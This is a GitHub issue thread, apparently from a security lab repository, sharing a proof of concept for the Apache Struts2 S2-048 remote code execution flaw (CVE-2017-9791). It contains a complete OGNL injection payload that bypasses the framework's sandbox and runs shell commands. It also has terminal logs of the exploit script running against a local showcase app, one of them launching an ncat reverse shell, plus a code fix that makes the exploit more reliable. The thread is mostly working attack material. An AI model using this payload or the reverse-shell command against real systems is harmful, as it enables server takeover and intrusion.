Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Apache Struts2 S2-048 #8

Closed
nixawk opened this issue Jul 7, 2017 · 5 comments
Closed

Apache Struts2 S2-048 #8

nixawk opened this issue Jul 7, 2017 · 5 comments
Labels
CVE-2017-9791

Comments

@nixawk
Copy link
Owner

nixawk commented Jul 7, 2017
edited
Loading

CVE-2017-9791

screen shot 2017-07-07 at 10 46 37

screen shot 2017-07-07 at 10 21 49

References

  1. https://cwiki.apache.org/confluence/display/WW/S2-048
  2. http://bobao.360.cn/news/detail/4219.html
  3. http://fisheye.apache.org:8060/browse/struts/apps/showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java?r1=59f4f31a7f3800a540c168abc67b8800db3f2f97&r2=73da12e723c2737bd515946588ddcd898acf584a
  4. https://github.com/Loneyers/vuldocker/tree/master/struts2/s2-048
@nixawk nixawk mentioned this issue Jul 7, 2017
Closed
@nixawk
Copy link
Owner Author

nixawk commented Jul 7, 2017

Poc Code - https://github.com/nixawk/labs/blob/master/CVE-2017-9791/exploit_S2-048.py

@nixawk
Copy link
Owner Author

nixawk commented Jul 7, 2017
edited
Loading

Another Poc Here:

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

If you use the following payload, an error may be here:

root@sh:~/S2-048# python s2.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ls -l"
[*] exploit Apache Struts2 S2-048
[+] command: ls -l
Traceback (most recent call last):
  File "s2.py", line 71, in <module>
    exploit(url, cmd)
  File "s2.py", line 52, in exploit
    resp = requests.post(url, data=data, headers=headers)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 110, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 641, in send
    r.content
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 797, in content
    self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 722, in generate
    raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))

Poc is updated. urllib2 can handle the exception.

root@sh:~/S2-048# python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
[*] name  : exploit Apache Struts2 S2-048
[+] status: http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action - vulnerable to Apache Struts2 S2-048
[+] execmd: ncat -e /bin/bash 127.0.0.1 4444
Ncat: Connection refused.

root@sh:~/S2-048# python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "uname -a"
[*] name  : exploit Apache Struts2 S2-048
[+] status: http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action - vulnerable to Apache Struts2 S2-048
[+] execmd: uname -a
Linux sh 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

References

  1. https://stackoverflow.com/questions/14442222/how-to-handle-incompleteread-in-python

@dragoneeg
Copy link

my test Poc : https://github.com/dragoneeg/Struts2-048

@sasqwatch
Copy link

This is another shorter payload - http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/

@nixawk nixawk closed this as completed Jul 12, 2017
@nixawk
Copy link
Owner Author

nixawk commented Nov 28, 2017

If your poc makes an error based on requests, ex:

requests.exceptions.ChunkedEncodingError: ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))

Please try to add the following code:

import httplib

httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'

References

  1. https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
CVE-2017-9791
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@dragoneeg @nixawk @sasqwatch